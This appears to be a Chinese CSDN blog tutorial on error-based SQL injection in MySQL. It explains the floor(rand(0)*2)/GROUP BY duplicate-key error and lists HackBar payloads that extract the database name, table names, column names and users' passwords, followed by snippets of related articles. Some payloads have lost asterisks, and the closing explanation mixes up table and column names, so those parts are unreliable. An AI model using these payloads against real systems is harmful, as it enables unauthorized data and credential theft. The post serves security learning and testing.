报错型SQL注入

最新推荐文章于 2024-08-27 10:28:58 发布
原创 最新推荐文章于 2024-08-27 10:28:58 发布 · 277 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#SQL注入

本文深入探讨报错型SQL注入的原理与实践,通过关键函数rand(0), floor(), groupby的应用,实现数据库、表、列名及数据的爆破。文章提供了具体的SQL语句示例,适用于不同场景下的安全测试。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

最近一直在看sql,xss,文件上传之类的漏洞,没有抽出空来写写博客

上次总结了SQL注入比较基础的整型和字符型的注入,今天就总结一下报错型的SQL注入,等下次有时间了在写一些,布尔型的和时间型的盲注

关于报错型的注入,是在当注入对时不显示想得到的数据或者说注入对的时候只会有一种反应,但当注入错误时候会返回错误,这时就可以用报错型的注入方法。
报错型注入:
关键语句:
select count(*),(floor(rand(0)*2))x from information_schema.tables group by x

最关键的是三个函数分别是: rand(0),floor(),group by
基本上是靠这三个函数来报错的,其中的原理我也是查了好多CSDN上也有一下博主说的十分的详细还带有例子,简单的说明一下,floor(rand(0)*2)的值是有一定顺序的是 0110110110…,group by x 是对表里x进行扫描然后形成表,当表里没有x值时count为1,当存在一个一样的时count +1,表中x为主键。group by 有一个特点是x的值没在表中时,在插入之前对group by后面的语句会再进行一次计算,然后再插入。有时会用 group by (floor(rand(0)2))来进行报错,是因为rand(0)函数具有一定的随机性,在计算时插入表的时候会造成主键的冲突,从而出错,接着报错。
下面列一下我用的报错语句,我这里就粘贴的hackbar里的报错语句(还是要学会用一些工具来帮助自己,这样会比较方便快捷)
爆库名:AND(SELECT 1 FROM (SELECT COUNT(),CONCAT((SELECT(SELECT CONCAT(CAST(DATABASE() AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=DATABASE() LIMIT 0,1),FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)
爆表名: AND(SELECT 1 FROM (SELECT COUNT(),CONCAT((SELECT(SELECT CONCAT(CAST(table_name AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=DATABASE() LIMIT 0,1),FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)
爆列名: AND (SELECT 1 FROM (SELECT COUNT(),CONCAT((SELECT(SELECT CONCAT(CAST(column_name AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=DATABASE() LIMIT 0,1),FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)
爆数据: AND (SELECT 1 FROM (SELECT COUNT(),CONCAT((SELECT(SELECT CONCAT(CAST(CONCAT(password) AS CHAR),0x7e)) FROM users LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)

PS:
因为是好早之前做的了,这里就没有截图了,只是总结一下报错型注入的大致原理和语句。
解释一下这些语句中 database()是库名,username表名,users列名

22-1.1 SQL注入的类型之GET基于报错的SQL注入回显分析
weixin_43263566的博客
01-22 235
这个实验环境来学习基于报错的SQL注入。按照实验指导,在URL中修改ID参数值,并观察页面的回显情况。尝试上述探测方法,同时学习如何使用工具(如SQLmap)来辅助注入攻击。我们可以通过修改URL中的ID参数值来探测是否存在注入漏洞。
22-2 GET基于报错的sql注入利用-脱库
weixin_43263566的博客
01-24 346
因为在上一篇文章已经找出sql注入靶场前四关的注入点与闭合符,下面的操作我们基于这个基础上实现。
Sql注入-报错注入
WolvenSec的博客
06-06 2140
报错注入(Error-Based Injection)是一种通过引起数据库报错并从错误信息中提取有用信息的SQL注入攻击手法;攻击者利用数据库在处理异常情况时返回的错误消息,来推断出数据库结构、字段名甚至数据内容;这种攻击方法依赖于数据库将详细的错误消息返回给客户端。若在测试时发现网页会回显sql相关的报错信息,那么此时就可以尝试使用错误注入这种方式进行渗透。可以利用报错注入的前提:就是页面有错误信息显示出来、保证函数能够正确执行。
报错SQL注入
SheXinK’s Blog
12-17 470
报错SQL注入1、 SQL注入介绍2、 POST注入PHP代码3、 POST注入测试4、 SQL注入防御 1、 SQL注入介绍   SQL注入介绍:SQL注入介绍   注入产生原因:web应用程序对用户输入数据的合法性没有判断或过滤不严,导致恶意payload直接带入SQL语句执行,从而执行payload中非法操作! 2、 POST注入PHP代码   新建PHP文件,将下面代码复制到PHP文件中,...
SQL注入2(报错型注入
嚴 帅的博客
04-25 856
SQL注入(一)https://blog.csdn.net/weixin_43997530/article/details/105627979 报错型SQL注入 我们先介绍一下报错型SQL注入报错型sql注入sql注入(一)的前三步是一致的,但没有数据的回显位,也就是说即使构造语句成功我们也没有办法看到数据的显示。但是如果sql语句出现错误则可以显示在页面上,我们可以利用这点来构造报错显示...
SQL报错型注入
weixin_44029504的博客
04-16 400
报错型SQL注入 -------------------------------------------------我是小小分隔符---------------------------------------------- 基本原理: 报错型sql注入SQL联合注入的前三步是一致的(上篇博客),但没有数据的回显位,也就是说即使构造语句成功我们也没有办法看到数据的显示。但是如果sql语句出现错误则...
SQL注入报错型注入
qq_43348375的博客
04-01 565
sql注入之报错注入
第四节 基于报错的SQL注入-01
09-15
基于报错的SQL注入 SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过在输入参数中inject恶意SQL代码来获取敏感数据或控制服务器。今天,我们将讨论基于报错的SQL注入,包括其分类、发现和利用方法。 SQL注入...
sql注入之报错注入
最新发布
m0_63436163的博客
08-27 1429
报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。
SQL注入:报错注入
qq_68163788的博客
01-27 3321
QL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入中注入恶意的SQL代码来执行未经授权的数据库操作。报错注入是一种SQL注入的类型,它利用数据库在执行恶意SQL语句时产生的错误消息来获取有关数据库结构和数据的信息。 假设有一个使用用户输入构建SQL查询的应用程序。攻击者可以通过在输入中注入恶意的SQL代码来触发数据库错误,并从错误消息中获取有关数据库的信息,如表名、列名等。这些信息可以帮助攻击者进一步利用数据库。
sql 报错注入
travelnight的博客
03-15 4303
以往个人知识星球搬运 by travelnight 这里以sql-libs为例。 一、基础报错注入 这里的东西比较简单,快速略过。 访问:http://127.0.0.1/sqllabs/Less-1/ 直接构造id参数 http://127.0.0.1/sqllabs/Less-1/?id=1 直接加 ‘触发报错 直接闭合‘ 标签发现正常,说明存在报错注入。 http://127.0.0.1/sqllabs/Less-1/...
SQL报错注入
qq_64332865的博客
02-18 716
基于报错的注入,是指通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面的错误提示回显出来。 报错注入一般需要具备两个前提条件:(1)Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上;(2)后台未对一些具有报错功能的函数进行过滤。 常用的报错功能函数包括extractvalue()、 updatexml)、floor()、exp()等。 关于floor()函数,在进行报错注入时,floor()函数一般需要与rand()、count()、g
web安全入门之SQL注入-报错型注入
weixin_43726831的博客
09-12 1239
SQL注入报错型注入法 1.报错型注入分析 报错型注入法适用于无回显数据的场景,适合于没有显示位的web页面,但是有mysql报错输出的场景。metasploitable2-Linux在Less-5和Less-6中就用到了报错型注入方法 这种页面有明显的三种场景 场景1:正确查询成功场景为结果显示。 场景2:正确查询失败场景为空,不显示。 场景3:错误语句查询场景,显示报错语句。 在这种情况下...
SQL注入报错型注入
noob_3000的博客
08-11 675
SQL注入报错型】CTFHUB学习记录
SQL注入——报错型注入
qq_41554179的博客
03-12 628
报错型sql注入 报错型sql注入上述sql注入的前三步是一致的,但没有数据的回显位,也就是说即使构造语句成功我们也没有办法看到数据的显示。但是如果sql语句出现错误则可以显示在页面上,我们可以利用这点来构造报错显示sql语句。下边是利用count(*), FLOOR(RAND(0)*2,group by报错。 语句: - AND(SELECT 1 FROM (SELECT COUNT(*...
SQL 报错注入详解
2301_78008478的博客
05-08 1265
近期学习 SQL 报错注入,本篇文章为关于报错注入的一些个人理解,如有错误,希望指出 本文使用 sqli-labs 数据库作为示例报错注入方式有很多,其中比较常见的有 floor() 、extractvalue() 、updatexml() 三种,本篇文章主要对这三种进行分析先贴上一个常见的 payload 再进行分析 (sqli-labs Less-5) 复制首先这个 payload 和网上很多的不太一样,查阅网上相关博客时发现大多数的 payload 都是这样写的 复制这个就是把发生报错的 se
安鸾sql报错型注入02
07-25
对于安鸾SQL报错型注入02,报错注入是利用网站的报错信息来带出我们想要的信息。在报错注入中,我们可以使用一些常用的命令来测试平台和获取信息。其中,floor()+rand()+group()函数是一种常用的报错注入命令。另外,还可以使用extractvalue()函数来进行注入。\[2\]\[3\] 请注意,SQL注入是一种安全漏洞,它可以允许攻击者执行恶意的SQL语句,从而获取敏感信息或者对数据库进行破坏。为了保护网站的安全,建议开发人员采取相应的防护措施,如使用参数化查询、输入验证和过滤等。 #### 引用[.reference_title] - *1* [安鸾渗透实战平台|SQL数字型GET注入02](https://blog.csdn.net/m_de_g/article/details/121705420)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [【SQL注入03】报错注入实例操作](https://blog.csdn.net/Fighting_hawk/article/details/123003447)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值